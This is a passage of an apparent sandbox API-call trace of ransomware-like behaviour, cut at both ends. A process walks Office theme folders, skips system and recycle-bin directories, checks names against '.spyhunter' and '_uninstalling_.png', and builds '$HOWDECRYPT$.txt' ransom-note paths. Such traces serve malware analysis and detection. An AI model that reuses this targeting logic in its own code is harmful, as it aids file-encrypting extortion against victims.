lstrcmpW (lpString1="AXIS", lpString2=".") returned 1 [0089.981] lstrcmpW (lpString1="AXIS", lpString2="..") returned 1 [0089.981] GetProcessHeap () returned 0x2c0000 [0089.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.982] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*") returned 66 [0089.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0089.984] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.984] lstrlenW (lpString="Windows") returned 7 [0089.984] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.984] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.984] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.984] lstrlenW (lpString="System Volume Information") returned 25 [0089.984] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\.") returned 66 [0089.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.984] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.984] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.984] lstrlenW (lpString="Windows") returned 7 [0089.984] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.985] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.985] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.985] lstrlenW (lpString="System Volume Information") returned 25 [0089.985] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\..") returned 67 [0089.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.985] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.985] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.985] lstrcmpiW (lpString1="AXIS.ELM", lpString2="Windows") returned -1 [0089.985] lstrlenW (lpString="Windows") returned 7 [0089.985] lstrcmpiW (lpString1="AXIS.ELM", lpString2="$Recycle.bin") returned 1 [0089.985] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.985] lstrcmpiW (lpString1="AXIS.ELM", lpString2="System Volume Information") returned -1 [0089.985] lstrlenW (lpString="System Volume Information") returned 25 [0089.985] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0089.985] StrStrIW (lpFirst="AXIS.ELM", lpSrch=".spyhunter") returned 0x0 [0089.985] lstrcmpW (lpString1="AXIS.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.985] lstrcmpW (lpString1="AXIS.ELM", lpString2="_uninstalling_.png") returned 1 [0089.985] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0089.985] GetProcessHeap () returned 0x2c0000 [0089.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x386400 [0089.985] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf20) returned 0x3824f8 [0089.985] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.985] lstrcmpiW (lpString1="AXIS.INF", lpString2="Windows") returned -1 [0089.985] lstrlenW (lpString="Windows") returned 7 [0089.985] lstrcmpiW (lpString1="AXIS.INF", lpString2="$Recycle.bin") returned 1 [0089.985] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.985] lstrcmpiW (lpString1="AXIS.INF", lpString2="System Volume Information") returned -1 [0089.986] lstrlenW (lpString="System Volume Information") returned 25 [0089.986] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0089.986] StrStrIW (lpFirst="AXIS.INF", lpSrch=".spyhunter") returned 0x0 [0089.986] lstrcmpW (lpString1="AXIS.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.986] lstrcmpW (lpString1="AXIS.INF", lpString2="_uninstalling_.png") returned 1 [0089.986] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0089.986] GetProcessHeap () returned 0x2c0000 [0089.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x3857c0 [0089.986] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf28) returned 0x3824f8 [0089.986] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.986] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0089.986] lstrlenW (lpString="Windows") returned 7 [0089.986] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0089.986] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.986] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0089.986] lstrlenW (lpString="System Volume Information") returned 25 [0089.986] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0089.986] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0089.986] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.986] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 76 [0089.987] GetProcessHeap () returned 0x2c0000 [0089.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x374218 [0089.987] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf30) returned 0x3824f8 [0089.987] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.987] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0089.987] lstrlenW (lpString="Windows") returned 7 [0089.987] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0089.987] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.987] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0089.987] lstrlenW (lpString="System Volume Information") returned 25 [0089.987] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0089.987] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0089.987] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.987] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0089.987] GetProcessHeap () returned 0x2c0000 [0089.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3744d0 [0089.987] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf38) returned 0x3824f8 [0089.987] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0089.987] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0089.987] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\$HOWDECRYPT$.txt") returned 81 [0089.988] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\$HOWDECRYPT$.txt") returned 81 [0089.988] GetProcessHeap () returned 0x2c0000 [0089.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343de8 [0089.988] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf40) returned 0x3824f8 [0089.988] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.988] lstrcmpiW (lpString1="BLENDS", lpString2="Windows") returned -1 [0089.988] lstrlenW (lpString="Windows") returned 7 [0089.988] lstrcmpiW (lpString1="BLENDS", lpString2="$Recycle.bin") returned 1 [0089.988] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.988] lstrcmpiW (lpString1="BLENDS", lpString2="System Volume Information") returned -1 [0089.988] lstrlenW (lpString="System Volume Information") returned 25 [0089.988] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned 66 [0089.988] lstrcmpW (lpString1="BLENDS", lpString2=".") returned 1 [0089.988] lstrcmpW (lpString1="BLENDS", lpString2="..") returned 1 [0089.988] GetProcessHeap () returned 0x2c0000 [0089.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.988] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*") returned 68 [0089.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.017] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.018] lstrlenW (lpString="Windows") returned 7 [0090.018] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.018] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.018] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.018] lstrlenW (lpString="System Volume Information") returned 25 [0090.018] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\.") returned 68 [0090.018] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.018] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.018] lstrlenW (lpString="Windows") returned 7 [0090.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.018] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.018] lstrlenW (lpString="System Volume Information") returned 25 [0090.018] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\..") returned 69 [0090.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.018] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.018] lstrcmpiW (lpString1="BLENDS.ELM", lpString2="Windows") returned -1 [0090.018] lstrlenW (lpString="Windows") returned 7 [0090.018] lstrcmpiW (lpString1="BLENDS.ELM", lpString2="$Recycle.bin") returned 1 [0090.018] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.018] lstrcmpiW (lpString1="BLENDS.ELM", lpString2="System Volume Information") returned -1 [0090.018] lstrlenW (lpString="System Volume Information") returned 25 [0090.018] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned 77 [0090.019] StrStrIW (lpFirst="BLENDS.ELM", lpSrch=".spyhunter") returned 0x0 [0090.019] lstrcmpW (lpString1="BLENDS.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.019] lstrcmpW (lpString1="BLENDS.ELM", lpString2="_uninstalling_.png") returned 1 [0090.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned 77 [0090.019] GetProcessHeap () returned 0x2c0000 [0090.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3745b8 [0090.019] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf20) returned 0x3824f8 [0090.019] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.019] lstrcmpiW (lpString1="BLENDS.INF", lpString2="Windows") returned -1 [0090.019] lstrlenW (lpString="Windows") returned 7 [0090.019] lstrcmpiW (lpString1="BLENDS.INF", lpString2="$Recycle.bin") returned 1 [0090.019] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.019] lstrcmpiW (lpString1="BLENDS.INF", lpString2="System Volume Information") returned -1 [0090.019] lstrlenW (lpString="System Volume Information") returned 25 [0090.019] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF") returned 77 [0090.019] StrStrIW (lpFirst="BLENDS.INF", lpSrch=".spyhunter") returned 0x0 [0090.019] lstrcmpW (lpString1="BLENDS.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.019] lstrcmpW (lpString1="BLENDS.INF", lpString2="_uninstalling_.png") returned 1 [0090.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF") returned 77 [0090.019] GetProcessHeap () returned 0x2c0000 [0090.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3746a0 [0090.019] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf28) returned 0x3824f8 [0090.019] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.019] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.019] lstrlenW (lpString="Windows") returned 7 [0090.020] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.020] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.020] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.020] lstrlenW (lpString="System Volume Information") returned 25 [0090.020] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 78 [0090.020] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.020] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.020] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 78 [0090.020] GetProcessHeap () returned 0x2c0000 [0090.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x374788 [0090.020] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf30) returned 0x3824f8 [0090.020] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.020] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.020] lstrlenW (lpString="Windows") returned 7 [0090.020] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.020] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.020] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.020] lstrlenW (lpString="System Volume Information") returned 25 [0090.020] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 79 [0090.020] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.020] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.020] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 79 [0090.020] GetProcessHeap () returned 0x2c0000 [0090.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x374870 [0090.021] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf38) returned 0x3824f8 [0090.021] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.021] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.021] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\$HOWDECRYPT$.txt") returned 83 [0090.021] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\$HOWDECRYPT$.txt") returned 83 [0090.021] GetProcessHeap () returned 0x2c0000 [0090.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x343cf8 [0090.021] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf40) returned 0x3824f8 [0090.023] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.023] lstrcmpiW (lpString1="BLUECALM", lpString2="Windows") returned -1 [0090.023] lstrlenW (lpString="Windows") returned 7 [0090.023] lstrcmpiW (lpString1="BLUECALM", lpString2="$Recycle.bin") returned 1 [0090.023] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.023] lstrcmpiW (lpString1="BLUECALM", lpString2="System Volume Information") returned -1 [0090.023] lstrlenW (lpString="System Volume Information") returned 25 [0090.024] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned 68 [0090.024] lstrcmpW (lpString1="BLUECALM", lpString2=".") returned 1 [0090.024] lstrcmpW (lpString1="BLUECALM", lpString2="..") returned 1 [0090.024] GetProcessHeap () returned 0x2c0000 [0090.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.024] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*") returned 70 [0090.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.024] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.024] lstrlenW (lpString="Windows") returned 7 [0090.024] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.024] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.024] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.024] lstrlenW (lpString="System Volume Information") returned 25 [0090.024] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\.") returned 70 [0090.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.024] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.024] lstrlenW (lpString="Windows") returned 7 [0090.024] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.025] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.025] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.025] lstrlenW (lpString="System Volume Information") returned 25 [0090.025] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\..") returned 71 [0090.025] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.025] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.025] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.025] lstrcmpiW (lpString1="BLUECALM.ELM", lpString2="Windows") returned -1 [0090.025] lstrlenW (lpString="Windows") returned 7 [0090.025] lstrcmpiW (lpString1="BLUECALM.ELM", lpString2="$Recycle.bin") returned 1 [0090.026] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.026] lstrcmpiW (lpString1="BLUECALM.ELM", lpString2="System Volume Information") returned -1 [0090.026] lstrlenW (lpString="System Volume Information") returned 25 [0090.026] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned 81 [0090.026] StrStrIW (lpFirst="BLUECALM.ELM", lpSrch=".spyhunter") returned 0x0 [0090.026] lstrcmpW (lpString1="BLUECALM.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.026] lstrcmpW (lpString1="BLUECALM.ELM", lpString2="_uninstalling_.png") returned 1 [0090.026] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned 81 [0090.026] GetProcessHeap () returned 0x2c0000 [0090.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343de8 [0090.026] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf48) returned 0x3824f8 [0090.026] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.026] lstrcmpiW (lpString1="BLUECALM.INF", lpString2="Windows") returned -1 [0090.026] lstrlenW (lpString="Windows") returned 7 [0090.026] lstrcmpiW (lpString1="BLUECALM.INF", lpString2="$Recycle.bin") returned 1 [0090.026] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.026] lstrcmpiW (lpString1="BLUECALM.INF", lpString2="System Volume Information") returned -1 [0090.026] lstrlenW (lpString="System Volume Information") returned 25 [0090.026] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF") returned 81 [0090.026] StrStrIW (lpFirst="BLUECALM.INF", lpSrch=".spyhunter") returned 0x0 [0090.026] lstrcmpW (lpString1="BLUECALM.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.026] lstrcmpW (lpString1="BLUECALM.INF", lpString2="_uninstalling_.png") returned 1 [0090.026] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF") returned 81 [0090.026] GetProcessHeap () returned 0x2c0000 [0090.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343ed8 [0090.027] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf50) returned 0x3824f8 [0090.027] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.027] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.027] lstrlenW (lpString="Windows") returned 7 [0090.027] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.027] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.027] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.027] lstrlenW (lpString="System Volume Information") returned 25 [0090.027] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0090.027] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.027] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.027] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.027] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0090.027] GetProcessHeap () returned 0x2c0000 [0090.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x343fc8 [0090.027] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf58) returned 0x3824f8 [0090.027] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.027] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.027] lstrlenW (lpString="Windows") returned 7 [0090.027] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.027] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.027] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.027] lstrlenW (lpString="System Volume Information") returned 25 [0090.027] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0090.027] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.027] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.028] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0090.028] GetProcessHeap () returned 0x2c0000 [0090.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3440b8 [0090.028] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf60) returned 0x3824f8 [0090.028] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.028] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.028] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 